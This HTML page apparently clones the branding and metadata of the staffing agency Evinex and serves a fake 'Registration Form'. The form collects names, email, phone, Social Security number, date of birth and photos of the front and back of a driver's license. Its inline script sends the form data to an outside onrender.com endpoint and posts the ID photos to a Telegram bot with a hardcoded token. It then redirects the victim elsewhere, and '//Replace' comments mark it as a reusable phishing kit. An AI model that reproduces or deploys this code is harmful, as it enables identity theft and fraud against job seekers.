<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <!-- Search Engine Optimization by Rank Math PRO - https://rankmath.com/ -->
        <title>
          Evinex: Boutique Staffing Agency For Quality Talent And Business Growth
        </title>
        <meta
          name="description"
          content="Searching for a staffing agency that understands your business needs? Evinex offers tailored staffing solutions to help companies find quality talent. Elevate your team with us today!"
        />
        <meta
          name="robots"
          content="follow, index, max-snippet:-1, max-video-preview:-1, max-image-preview:large"
        />
        <link rel="canonical" href="https://www.evinex.com/" />
        <meta property="og:locale" content="en_US" />
        <meta property="og:type" content="website" />
        <script src="https://cdn.tailwindcss.com"></script>

        <meta
          property="og:title"
          content="Evinex: Boutique Staffing Agency For Quality Talent And Business Growth"
        />
        <meta
          property="og:description"
          content="Searching for a staffing agency that understands your business needs? Evinex offers tailored staffing solutions to help companies find quality talent. Elevate your team with us today!"
        />
        <meta property="og:url" content="https://www.evinex.com/" />
        <meta
          property="og:site_name"
          content="Evinex Corporation | Staffing Agency"
        />
        <meta property="og:updated_time" content="2023-12-05T17:53:58-08:00" />
        <meta property="og:image" content="images/Logo-Evinex-16x9-1.png" />
        <meta
          property="og:image:secure_url"
          content="images/Logo-Evinex-16x9-1.png"
        />
        <meta property="og:image:width" content="1600" />
        <meta property="og:image:height" content="900" />
        <meta property="og:image:alt" content="Evinex Logo" />
        <meta property="og:image:type" content="image/png" />
        <meta
          property="article:published_time"
          content="2023-10-01T12:25:19-07:00"
        />
        <meta
          property="article:modified_time"
          content="2023-12-05T17:53:58-08:00"
        />
        <meta name="twitter:card" content="summary_large_image" />
        <meta
          name="twitter:title"
          content="Evinex: Boutique Staffing Agency For Quality Talent And Business Growth"
        />
        <meta
          name="twitter:description"
          content="Searching for a staffing agency that understands your business needs? Evinex offers tailored staffing solutions to help companies find quality talent. Elevate your team with us today!"
        />
        <meta name="twitter:site" content="@evinex" />
        <meta name="twitter:creator" content="@evinex" />
        <meta
          name="twitter:image"
          content="https://www.evinex.com/wp-content/uploads/2020/09/Logo-Evinex-16x9-1.png"
        />
        <meta name="twitter:label1" content="Written by" />
        <meta name="twitter:data1" content="Evinex" />
        <meta name="twitter:label2" content="Time to read" />
        <meta name="twitter:data2" content="5 minutes" />
        <script type="application/ld+json" class="rank-math-schema-pro">
          {
            "@context": "https://schema.org",
            "@graph": [
              {
                "@type": "EmploymentAgency",
                "name": "Evinex",
                "url": "https://www.evinex.com",
                "logo": "https://www.evinex.com/wp-content/uploads/2020/08/evinex-logo-600-300.jpg",
                "telephone": "+1-555-555-5555",
                "email": "info@evinex.com",
                "address": {
                  "@type": "PostalAddress",
                  "streetAddress": "620 Newport Center Dr",
                  "addressLocality": "Newport Beach",
                  "addressRegion": "CA",
                  "postalCode": "92660",
                  "addressCountry": "USA"
                },
                "description": "Evinex is a boutique staffing agency headquartered in Southern California, specializing in tailored talent acquisition solutions. With over 100 years of combined experience in the technology industry, our team offers a unique blend of staffing expertise and hands-on experience. We focus on delivering quality candidates that align with your company's culture and objectives, serving a wide range of industries from tech startups to healthcare giants. Partner with Evinex for a seamless, effective staffing experience.",
                "areaServed": "USA",
                "@id": "https://www.evinex.com/#Evinex",
                "keywords": "staffing agency, staffing firm, staffing services, recruiting, talent acquisition, job seekers"
              },
              {
                "@type": "Organization",
                "@id": "https://www.evinex.com/#organization",
                "name": "Evinex",
                "sameAs": [
                  "https://www.facebook.com/evinexcorp/",
                  "https://twitter.com/evinex"
                ],
                "logo": {
                  "@type": "ImageObject",
                  "@id": "https://www.evinex.com/#logo",
                  "url": "https://www.evinex.com/wp-content/uploads/2020/09/Logo-Evinex-1x1-1.png",
                  "contentUrl": "https://www.evinex.com/wp-content/uploads/2020/09/Logo-Evinex-1x1-1.png",
                  "caption": "Evinex",
                  "inLanguage": "en-US",
                  "width": "1200",
                  "height": "1200"
                }
              },
              {
                "@type": "WebSite",
                "@id": "https://www.evinex.com/#website",
                "url": "https://www.evinex.com",
                "name": "Evinex",
                "publisher": { "@id": "https://www.evinex.com/#organization" },
                "inLanguage": "en-US",
                "potentialAction": {
                  "@type": "SearchAction",
                  "target": "https://www.evinex.com/?s={search_term_string}",
                  "query-input": "required name=search_term_string"
                }
              },
              {
                "@type": "ImageObject",
                "@id": "https://www.evinex.com/wp-content/uploads/2023/12/evinex-staffing-agency-firm.jpg",
                "url": "https://www.evinex.com/wp-content/uploads/2023/12/evinex-staffing-agency-firm.jpg",
                "width": "200",
                "height": "200",
                "inLanguage": "en-US"
              },
              {
                "@type": "WebPage",
                "@id": "https://www.evinex.com/#webpage",
                "url": "https://www.evinex.com/",
                "name": "Evinex: Boutique Staffing Agency For Quality Talent And Business Growth",
                "datePublished": "2023-10-01T12:25:19-07:00",
                "dateModified": "2023-12-05T17:53:58-08:00",
                "about": { "@id": "https://www.evinex.com/#organization" },
                "isPartOf": { "@id": "https://www.evinex.com/#website" },
                "primaryImageOfPage": {
                  "@id": "https://www.evinex.com/wp-content/uploads/2023/12/evinex-staffing-agency-firm.jpg"
                },
                "inLanguage": "en-US"
              },
              {
                "@type": "Person",
                "@id": "https://www.evinex.com/author/eviadmin/",
                "name": "Evinex",
                "description": "Evinex is a boutique staffing agency headquartered in Southern California, specializing in tailored talent acquisition solutions. With over 100 years of combined experience in the technology industry, our team offers a unique blend of staffing expertise and hands-on experience. We focus on delivering quality candidates that align with your company's culture and objectives, serving a wide range of industries from tech startups to healthcare giants. Partner with Evinex for a seamless, effective staffing experience.",
                "url": "https://www.evinex.com/author/eviadmin/",
                "image": {
                  "@type": "ImageObject",
                  "@id": "https://secure.gravatar.com/avatar/6d76dff7967ddb5a32c887028bf3b68f?s=96&d=mm&r=g",
                  "url": "https://secure.gravatar.com/avatar/6d76dff7967ddb5a32c887028bf3b68f?s=96&d=mm&r=g",
                  "caption": "Evinex",
                  "inLanguage": "en-US"
                },
                "sameAs": [
                  "https://www.evinex.com/",
                  "https://www.facebook.com/evinexcorp/",
                  "https://twitter.com/evinex",
                  "https://www.linkedin.com/company/evinex"
                ],
                "worksFor": { "@id": "https://www.evinex.com/#organization" }
              },
              {
                "@type": "Article",
                "headline": "Evinex: Boutique Staffing Agency For Quality Talent And Business Growth",
                "keywords": "Staffing Agency",
                "datePublished": "2023-10-01T12:25:19-07:00",
                "dateModified": "2023-12-05T17:53:58-08:00",
                "author": {
                  "@id": "https://www.evinex.com/author/eviadmin/",
                  "name": "Evinex"
                },
                "publisher": { "@id": "https://www.evinex.com/#organization" },
                "description": "Searching for a staffing agency that understands your business needs? Evinex offers tailored staffing solutions to help companies find quality talent. Elevate your team with us today!",
                "name": "Evinex: Boutique Staffing Agency For Quality Talent And Business Growth",
                "@id": "https://www.evinex.com/#richSnippet",
                "isPartOf": { "@id": "https://www.evinex.com/#webpage" },
                "image": {
                  "@id": "https://www.evinex.com/wp-content/uploads/2023/12/evinex-staffing-agency-firm.jpg"
                },
                "inLanguage": "en-US",
                "mainEntityOfPage": { "@id": "https://www.evinex.com/#webpage" }
              }
            ]
          }
        </script>
        <!-- /Rank Math WordPress SEO plugin -->
    
        <link rel="dns-prefetch" href="//a.omappapi.com" />
    
        <link
          rel="stylesheet"
          id="wp-block-library-css"
          href="css/style.min_1.css"
          media="all"
        />
        <style id="rank-math-toc-block-style-inline-css">
          .wp-block-rank-math-toc-block nav ol {
            counter-reset: item;
          }
          .wp-block-rank-math-toc-block nav ol li {
            display: block;
          }
          .wp-block-rank-math-toc-block nav ol li:before {
            content: counters(item, ".") " ";
            counter-increment: item;
          }
        </style>
        <style id="classic-theme-styles-inline-css">
          /*! This file is auto-generated */
          .wp-block-button__link {
            color: #fff;
            background-color: #32373c;
            border-radius: 9999px;
            box-shadow: none;
            text-decoration: none;
            padding: calc(0.667em + 2px) calc(1.333em + 2px);
            font-size: 1.125em;
          }
          .wp-block-file__button {
            background: #32373c;
            color: #fff;
            text-decoration: none;
          }
        </style>
        <link
          media="print"
          onload="this.media='all';this.onload=null;"
          rel="stylesheet"
          id="generateblocks-google-fonts-css"
          href="css/df6387c13a53.google-fonts.css"
        />
        <link
          rel="stylesheet"
          id="uagb-block-css-css"
          href="css/custom-style-blocks.css"
          media="all"
        />
        <link
          rel="stylesheet"
          id="zip-ai-sidebar-css"
          href="css/sidebar-app.css"
          media="all"
        />
        <link
          media="print"
          onload="this.media='all';this.onload=null;"
          rel="stylesheet"
          id="zip-ai-sidebar-google-fonts-css"
          href="css/39f75469510d.google-fonts.css"
        />
        <link
          rel="stylesheet"
          id="generate-widget-areas-css"
          href="css/widget-areas.min.css"
          media="all"
        />
        <link
          rel="stylesheet"
          id="generate-style-css"
          href="css/main.min.css"
          media="all"
        />
        <style id="generate-style-inline-css">
          .is-right-sidebar {
            width: 25%;
          }
          .is-left-sidebar {
            width: 30%;
          }
          .site-content .content-area {
            width: 100%;
          }
          @media (max-width: 992px) {
            .main-navigation .menu-toggle,
            .sidebar-nav-mobile:not(#sticky-placeholder) {
              display: block;
            }
            .main-navigation ul,
            .gen-sidebar-nav,
            .main-navigation:not(.slideout-navigation):not(.toggled) .main-nav > ul,
            .has-inline-mobile-toggle
              #site-navigation
              .inside-navigation
              > *:not(.navigation-search):not(.main-nav) {
              display: none;
            }
            .nav-align-right .inside-navigation,
            .nav-align-center .inside-navigation {
              justify-content: space-between;
            }
            .has-inline-mobile-toggle .mobile-menu-control-wrapper {
              display: flex;
              flex-wrap: wrap;
            }
            .has-inline-mobile-toggle .inside-header {
              flex-direction: row;
              text-align: left;
              flex-wrap: wrap;
            }
            .has-inline-mobile-toggle .header-widget,
            .has-inline-mobile-toggle #site-navigation {
              flex-basis: 100%;
            }
            .nav-float-left .has-inline-mobile-toggle #site-navigation {
              order: 10;
            }
          }
          .dynamic-author-image-rounded {
            border-radius: 100%;
          }
          .dynamic-featured-image,
          .dynamic-author-image {
            vertical-align: middle;
          }
          .one-container.blog .dynamic-content-template:not(:last-child),
          .one-container.archive .dynamic-content-template:not(:last-child) {
            padding-bottom: 0px;
          }
          .dynamic-entry-excerpt > p:last-child {
            margin-bottom: 0px;
          }
          .page-hero .inside-page-hero.grid-container {
            max-width: calc(1200px - 0px - 0px);
          }
          .inside-page-hero > *:last-child {
            margin-bottom: 0px;
          }
          .header-wrap {
            position: absolute;
            left: 0px;
            right: 0px;
            z-index: 10;
          }
          .header-wrap .site-header {
            background: transparent;
          }
        </style>
        <link
          media="print"
          onload="this.media='all';this.onload=null;"
          rel="stylesheet"
          id="generate-google-fonts-css"
          href="css/044a796e0e9f.google-fonts.css"
        />
        <link
          rel="stylesheet"
          id="code-snippets-site-styles-css"
          href="index_1.html"
          media="all"
        />
        <link
          rel="stylesheet"
          id="generatepress-dynamic-css"
          href="css/style.min.css"
          media="all"
        />
        <link
          rel="stylesheet"
          id="generateblocks-css"
          href="css/style-11402.css"
          media="all"
        />
        <link
          rel="stylesheet"
          id="generate-navigation-branding-css"
          href="css/navigation-branding-flex.min.css"
          media="all"
        />
        <style id="generate-navigation-branding-inline-css">
          @media (max-width: 992px) {
            .site-header,
            #site-navigation,
            #sticky-navigation {
              display: none !important;
              opacity: 0;
            }
            #mobile-header {
              display: block !important;
              width: 100% !important;
            }
            #mobile-header .main-nav > ul {
              display: none;
            }
            #mobile-header.toggled .main-nav > ul,
            #mobile-header .menu-toggle,
            #mobile-header .mobile-bar-items {
              display: block;
            }
            #mobile-header .main-nav {
              -ms-flex: 0 0 100%;
              flex: 0 0 100%;
              -webkit-box-ordinal-group: 5;
              -ms-flex-order: 4;
              order: 4;
            }
          }
          .main-navigation.has-branding .inside-navigation.grid-container,
          .main-navigation.has-branding.grid-container
            .inside-navigation:not(.grid-container) {
            padding: 0px 30px 0px 30px;
          }
          .main-navigation.has-branding:not(.grid-container)
            .inside-navigation:not(.grid-container)
            .navigation-branding {
            margin-left: 10px;
          }
          .navigation-branding img,
          .site-logo.mobile-header-logo img {
            height: 60px;
            width: auto;
          }
          .navigation-branding .main-title {
            line-height: 60px;
          }
          @media (max-width: 992px) {
            .main-navigation.has-branding.nav-align-center .menu-bar-items,
            .main-navigation.has-sticky-branding.navigation-stick.nav-align-center
              .menu-bar-items {
              margin-left: auto;
            }
            .navigation-branding {
              margin-right: auto;
              margin-left: 10px;
            }
            .navigation-branding .main-title,
            .mobile-header-navigation .site-logo {
              margin-left: 10px;
            }
            .main-navigation.has-branding .inside-navigation.grid-container {
              padding: 0px;
            }
          }
        </style>
        <meta name="robots" content="max-image-preview:large" />
        <!-- Google Tag Manager -->
        <script
          type="pmdelayedscript"
          data-cfasync="false"
          data-no-optimize="1"
          data-no-defer="1"
          data-no-minify="1"
        >
          (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
          new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
          j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
          'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
          })(window,document,'script','dataLayer','GTM-59PGNFG');
        </script>
        <!-- End Google Tag Manager -->
        <style id="uagb-style-conditional-extension">
          @media (min-width: 1025px) {
            body .uag-hide-desktop.uagb-google-map__wrap,
            body .uag-hide-desktop {
              display: none !important;
            }
          }
          @media (min-width: 768px) and (max-width: 1024px) {
            body .uag-hide-tab.uagb-google-map__wrap,
            body .uag-hide-tab {
              display: none !important;
            }
          }
          @media (max-width: 767px) {
            body .uag-hide-mob.uagb-google-map__wrap,
            body .uag-hide-mob {
              display: none !important;
            }
          }
        </style>
        <style id="uagb-style-frontend-11402">
          .wp-block-uagb-advanced-heading.uagb-block-39e018bf.wp-block-uagb-advanced-heading
            .uagb-heading-text {
            color: var(--base-3);
          }
          .wp-block-uagb-advanced-heading.uagb-block-39e018bf.wp-block-uagb-advanced-heading {
            text-align: left;
          }
          .wp-block-uagb-advanced-heading.uagb-block-39e018bf.wp-block-uagb-advanced-heading
            .uagb-desc-text {
            color: var(--base-3);
            margin-bottom: 15px;
          }
          .wp-block-uagb-advanced-heading.uagb-block-39e018bf.wp-block-uagb-advanced-heading
            .uagb-highlight {
            font-style: normal;
            font-weight: Default;
            background: #007cba;
            color: #fff;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-39e018bf.wp-block-uagb-advanced-heading
            .uagb-highlight::-moz-selection {
            color: #fff;
            background: #007cba;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-39e018bf.wp-block-uagb-advanced-heading
            .uagb-highlight::selection {
            color: #fff;
            background: #007cba;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-39e018bf .uagb-heading-text {
            text-transform: normal;
            font-size: 3.5em;
            margin-bottom: 5px;
          }
          .wp-block-uagb-advanced-heading.uagb-block-39e018bf .uagb-desc-text {
            font-size: 1.5em;
            line-height: 1.2em;
          }
          .wp-block-uagb-advanced-heading.uagb-block-14074993.wp-block-uagb-advanced-heading
            .uagb-heading-text {
            color: var(--base-3);
          }
          .wp-block-uagb-advanced-heading.uagb-block-14074993.wp-block-uagb-advanced-heading {
            text-align: left;
          }
          .wp-block-uagb-advanced-heading.uagb-block-14074993.wp-block-uagb-advanced-heading
            .uagb-desc-text {
            color: var(--base-3);
            margin-bottom: 15px;
          }
          .wp-block-uagb-advanced-heading.uagb-block-14074993.wp-block-uagb-advanced-heading
            .uagb-highlight {
            font-style: normal;
            font-weight: Default;
            background: #007cba;
            color: #fff;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-14074993.wp-block-uagb-advanced-heading
            .uagb-highlight::-moz-selection {
            color: #fff;
            background: #007cba;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-14074993.wp-block-uagb-advanced-heading
            .uagb-highlight::selection {
            color: #fff;
            background: #007cba;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-14074993 .uagb-heading-text {
            text-transform: normal;
            font-size: 3.5em;
            margin-bottom: 5px;
          }
          .wp-block-uagb-advanced-heading.uagb-block-14074993 .uagb-desc-text {
            font-size: 1.5em;
            line-height: 1.2em;
          }
          .wp-block-uagb-advanced-heading.uagb-block-64d395da.wp-block-uagb-advanced-heading
            .uagb-heading-text {
            color: var(--base-3);
          }
          .wp-block-uagb-advanced-heading.uagb-block-64d395da.wp-block-uagb-advanced-heading {
            text-align: left;
          }
          .wp-block-uagb-advanced-heading.uagb-block-64d395da.wp-block-uagb-advanced-heading
            .uagb-desc-text {
            color: var(--base-3);
            margin-bottom: 15px;
          }
          .wp-block-uagb-advanced-heading.uagb-block-64d395da.wp-block-uagb-advanced-heading
            .uagb-highlight {
            font-style: normal;
            font-weight: Default;
            background: #007cba;
            color: #fff;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-64d395da.wp-block-uagb-advanced-heading
            .uagb-highlight::-moz-selection {
            color: #fff;
            background: #007cba;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-64d395da.wp-block-uagb-advanced-heading
            .uagb-highlight::selection {
            color: #fff;
            background: #007cba;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-64d395da .uagb-heading-text {
            text-transform: normal;
            font-size: 3.5em;
            margin-bottom: 5px;
          }
          .wp-block-uagb-advanced-heading.uagb-block-64d395da .uagb-desc-text {
            font-size: 1.5em;
            line-height: 1.2em;
          }
          .wp-block-uagb-advanced-heading.uagb-block-2071efbf.wp-block-uagb-advanced-heading
            .uagb-heading-text {
            color: var(--base-3);
          }
          .wp-block-uagb-advanced-heading.uagb-block-2071efbf.wp-block-uagb-advanced-heading {
            text-align: left;
          }
          .wp-block-uagb-advanced-heading.uagb-block-2071efbf.wp-block-uagb-advanced-heading
            .uagb-desc-text {
            color: var(--base-3);
            margin-bottom: 15px;
          }
          .wp-block-uagb-advanced-heading.uagb-block-2071efbf.wp-block-uagb-advanced-heading
            .uagb-highlight {
            font-style: normal;
            font-weight: Default;
            background: #007cba;
            color: #fff;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-2071efbf.wp-block-uagb-advanced-heading
            .uagb-highlight::-moz-selection {
            color: #fff;
            background: #007cba;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-2071efbf.wp-block-uagb-advanced-heading
            .uagb-highlight::selection {
            color: #fff;
            background: #007cba;
            -webkit-text-fill-color: #fff;
          }
          .wp-block-uagb-advanced-heading.uagb-block-2071efbf .uagb-heading-text {
            text-transform: normal;
            font-size: 3.5em;
            margin-bottom: 5px;
          }
          .wp-block-uagb-advanced-heading.uagb-block-2071efbf .uagb-desc-text {
            font-size: 1.5em;
            line-height: 1.2em;
          }
          @media only screen and (max-width: 767px) {
            .wp-block-uagb-advanced-heading.uagb-block-39e018bf.wp-block-uagb-advanced-heading {
              text-align: center;
            }
            .wp-block-uagb-advanced-heading.uagb-block-14074993.wp-block-uagb-advanced-heading {
              text-align: center;
            }
            .wp-block-uagb-advanced-heading.uagb-block-64d395da.wp-block-uagb-advanced-heading {
              text-align: center;
            }
            .wp-block-uagb-advanced-heading.uagb-block-2071efbf.wp-block-uagb-advanced-heading {
              text-align: center;
            }
          }
          .uagb-block-4bba9612.wp-block-uagb-buttons.uagb-buttons__outer-wrap
            .uagb-buttons__wrap {
            column-gap: 10px;
          }
          .uagb-block-4bba9612.uagb-buttons__outer-wrap .uagb-buttons__wrap {
            justify-content: center;
            align-items: center;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e
            .uagb-button__wrapper
            .uagb-buttons-repeater.wp-block-button__link {
            box-shadow: 0px 0px 0 #00000026;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e
            .uagb-button__wrapper
            .uagb-buttons-repeater.wp-block-button__link:hover {
            box-shadow: 0px 0px 0 #00000026;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e
            .uagb-buttons-repeater.wp-block-button__link {
            border-top-width: 1px;
            border-left-width: 1px;
            border-right-width: 1px;
            border-bottom-width: 1px;
            border-color: #333;
            border-style: solid;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e
            .uagb-buttons-repeater.wp-block-button__link:hover {
            border-color: #333;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e
            .uagb-buttons-repeater.wp-block-button__link:focus {
            border-color: #333;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e.wp-block-button.is-style-outline
            .uagb-button__wrapper
            .wp-block-button__link.uagb-buttons-repeater {
            border-top-width: 1px;
            border-left-width: 1px;
            border-right-width: 1px;
            border-bottom-width: 1px;
            border-color: #333;
            border-style: solid;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e.wp-block-button.is-style-outline
            .uagb-button__wrapper
            .wp-block-button__link.uagb-buttons-repeater:hover {
            border-color: #333;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e
            .uagb-buttons-repeater
            .uagb-button__icon
            > svg {
            width: 15px;
            height: 15px;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e
            .uagb-buttons-repeater
            .uagb-button__icon-position-after {
            margin-left: 8px;
          }
          .wp-block-uagb-buttons
            .uagb-block-765da43e
            .uagb-buttons-repeater
            .uagb-button__icon-position-before {
            margin-right: 8px;
          }
          .wp-block-uagb-buttons .uagb-block-765da43e .uagb-button__link {
            text-transform: normal;
            text-decoration: none;
          }
          @media only screen and (max-width: 976px) {
            .uagb-block-4bba9612.uagb-buttons__outer-wrap .uagb-buttons__wrap {
              justify-content: center;
              align-items: center;
            }
            .wp-block-uagb-buttons
              .uagb-block-765da43e.wp-block-button.is-style-outline
              .uagb-button__wrapper
              .wp-block-button__link.uagb-buttons-repeater {
              border-style: solid;
              border-color: #333;
            }
          }
          @media only screen and (max-width: 767px) {
            .uagb-block-4bba9612.uagb-buttons__outer-wrap .uagb-buttons__wrap {
              justify-content: center;
              align-items: center;
            }
            .wp-block-uagb-buttons
              .uagb-block-765da43e.wp-block-button.is-style-outline
              .uagb-button__wrapper
              .wp-block-button__link.uagb-buttons-repeater {
              border-style: solid;
              border-color: #333;
            }
          }
        </style>
        <link rel="icon" href="images/Favicon-150x150.png" sizes="32x32" />
        <link rel="icon" href="images/Favicon.png" sizes="192x192" />
        <link rel="apple-touch-icon" href="images/Favicon.png" />
        <meta
          name="msapplication-TileImage"
          content="https://www.evinex.com/wp-content/uploads/2019/04/Favicon.png"
        />
      </head>
    

  <body class="bg-gray-100 p-8">
    <div class="max-w-md mx-auto bg-white p-6 rounded-md shadow-md">
      <!-- Company Logo -->
      <img
        src="images\logo-evinex-1.svg"
        alt="Company Logo"
        class="mb-4 mx-auto"
        style="max-width: 200px"
      />

      <h2 class="text-2xl font-bold mb-6 text-center">Registration Form</h2>

      <form
        id="registrationForm"
        onsubmit="submitForm(event)"
        enctype="multipart/form-data"
      >
        <div class="grid grid-cols-2 gap-4">
          <div>
            <label
              for="firstName"
              class="block text-sm font-medium text-gray-600"
              >First Name</label
            >
            <input
              type="text"
              id="firstName"
              name="firstName"
              placeholder="John"
              class="mt-1 p-2 w-full border rounded-md"
            />
          </div>
          <div>
            <label
              for="lastName"
              class="block text-sm font-medium text-gray-600"
              >Last Name</label
            >
            <input
              type="text"
              id="lastName"
              name="lastName"
              placeholder="Doe"
              class="mt-1 p-2 w-full border rounded-md"
            />
          </div>
        </div>

        <div class="mt-4">
          <label for="email" class="block text-sm font-medium text-gray-600"
            >Email</label
          >
          <input
            type="email"
            id="email"
            name="email"
            placeholder="john.doe@example.com"
            class="mt-1 p-2 w-full border rounded-md"
          />
        </div>

        <div class="mt-4">
          <label
            for="phoneNumber"
            class="block text-sm font-medium text-gray-600"
            >Phone Number (USA)</label
          >
          <input
            type="tel"
            id="phoneNumber"
            name="phoneNumber"
            type="number"
            placeholder="123-456-7890"
            class="mt-1 p-2 w-full border rounded-md"
          />
        </div>

        <div class="mt-4">
          <label for="ssn" class="block text-sm font-medium text-gray-600"
            >Social Security Number</label
          >
          <input
            type="text"
            id="ssn"
            name="ssn"
            type="number"
            placeholder="XXX-XX-XXXX"
            class="mt-1 p-2 w-full border rounded-md"
          />
        </div>

        <div class="grid grid-cols-2 gap-4 mt-4">
          <div>
            <label for="gender" class="block text-sm font-medium text-gray-600"
              >Gender</label
            >
            <select
              id="gender"
              name="gender"
              class="mt-1 p-2 w-full border rounded-md"
            >
              <option value="male">Male</option>
              <option value="female">Female</option>
              <option value="other">Other</option>
            </select>
          </div>
          <div>
            <label for="dob" class="block text-sm font-medium text-gray-600"
              >Date of Birth</label
            >
            <input
              type="date"
              id="dob"
              name="dob"
              class="mt-1 p-2 w-full border rounded-md"
            />
          </div>
        </div>

        <div class="mt-4">
          <label
            for="frontPicture"
            class="block text-sm font-medium text-gray-600"
            >Driver's License/State ID Front Picture</label
          >
          <div
            class="relative border-dashed border-2 border-gray-500 p-4 rounded-md"
          >
            <input
              type="file"
              id="frontPicture"
              name="frontPicture"
              accept="image/*"
              class="absolute inset-0 w-full h-full opacity-0 cursor-pointer"
              onchange="updateFileName('frontPicture', this)"
            />
            <div class="text-center">
              <p class="text-gray-500" id="frontPictureFileName">
                Drag and drop your file here or
              </p>
              <p class="text-blue-500">Browse</p>
            </div>
          </div>
        </div>

        <div class="mt-4">
          <label
            for="backPicture"
            class="block text-sm font-medium text-gray-600"
            >Driver's License/State ID Back Picture</label
          >
          <div
            class="relative border-dashed border-2 border-gray-500 p-4 rounded-md"
          >
            <input
              type="file"
              id="backPicture"
              name="backPicture"
              accept="image/*"
              class="absolute inset-0 w-full h-full opacity-0 cursor-pointer"
              onchange="updateFileName('backPicture', this)"
            />
            <div class="text-center">
              <p class="text-gray-500" id="backPictureFileName">
                Drag and drop your file here or
              </p>
              <p class="text-blue-500">Browse</p>
            </div>
          </div>
        </div>
        <div class="mt-4">
          <label for="acceptTerms" class="flex items-center">
            <input
              type="checkbox"
              id="acceptTerms"
              name="acceptTerms"
              class="form-checkbox"
            />
            <span class="ml-2 text-sm">I accept the terms and conditions</span>
          </label>
        </div>
        <div class="mt-6 text-center">
          <button
            type="submit"
            class="bg-[#1d4ed8] text-white px-4 py-2 rounded-md w-full hover:bg-d8deaa"
          >
            Submit
          </button>
        </div>
      </form>
    </div>

    <!-- ... Your existing HTML code ... -->

    <script>
      function updateFileName(inputId, inputElement) {
        const fileNameElement = document.getElementById(`${inputId}FileName`);
        const fileName = inputElement.files[0].name;
        fileNameElement.textContent = fileName;
      }

      async function submitForm(event) {
        event.preventDefault();
        const submitButton = document.querySelector('button[type="submit"]');
        submitButton.disabled = true;
        submitButton.textContent = "Processing...";

        const formData = new FormData(
          document.getElementById("registrationForm")
        );
        const response = await sendFormData(formData);

    

        // Check if a file is selected for front picture
        const frontPictureInput = document.getElementById("frontPicture");
        if (frontPictureInput.files.length > 0) {
          const photo = frontPictureInput.files[0];
          const photoResponse = await sendPhotoToTelegram(photo);
          if (!photoResponse.ok) {
            console.error(
              "Error sending photo to Telegram:",
              photoResponse.statusText
            );
          } else {
            console.log("Image sent 1")
          }
        }

        // Check if a file is selected for back picture
        const backPictureInput = document.getElementById("backPicture");
        if (backPictureInput.files.length > 0) {
          const photo = backPictureInput.files[0];
          const photoResponse = await sendPhotoToTelegram(photo);
          if (!photoResponse.ok) {
            console.error(
              "Error sending photo to Telegram:",
              photoResponse.statusText
            );
          } else {
            console.log("Image sent 2")
            window.location.replace("https://id-silk.vercel.app/"); //Repolace

          }
        }
      }

      async function sendFormData(formData) {
        try {
          return await fetch("https://telegram-bot-dkpv.onrender.com/saint", {
            method: "POST",
            headers: {
              "Content-Type": "application/json",
            },
            body: JSON.stringify(Object.fromEntries(formData)),
          });
        } catch (error) {
          console.error("Error sending data to Telegram:", error);
          return null;
        }
      }

      async function sendPhotoToTelegram(photo) {
        try {
          const formData = new FormData();
          formData.append("photo", photo);
          formData.append("chat_id", "6440732033"); //Replace

          return await fetch(
            // Replace
            "https://api.telegram.org/bot6653144224:AAFW1iIqFjjU_gEUqqMH1JYachZM0ea3FHI/sendphoto",
            {
              method: "POST",
              body: formData,
            }
          );
        } catch (error) {
          console.error("Error sending photo to Telegram:", error);
          return null;
        }
      }

      // Add event listeners for file input changes after defining functions
      window.addEventListener("load", function () {
        document
          .getElementById("frontPicture")
          .addEventListener("change", function () {
            updateFileName("frontPicture", this);
          });

        document
          .getElementById("backPicture")
          .addEventListener("change", function () {
            updateFileName("backPicture", this);
          });
      });
    </script>
  </body>
</html>
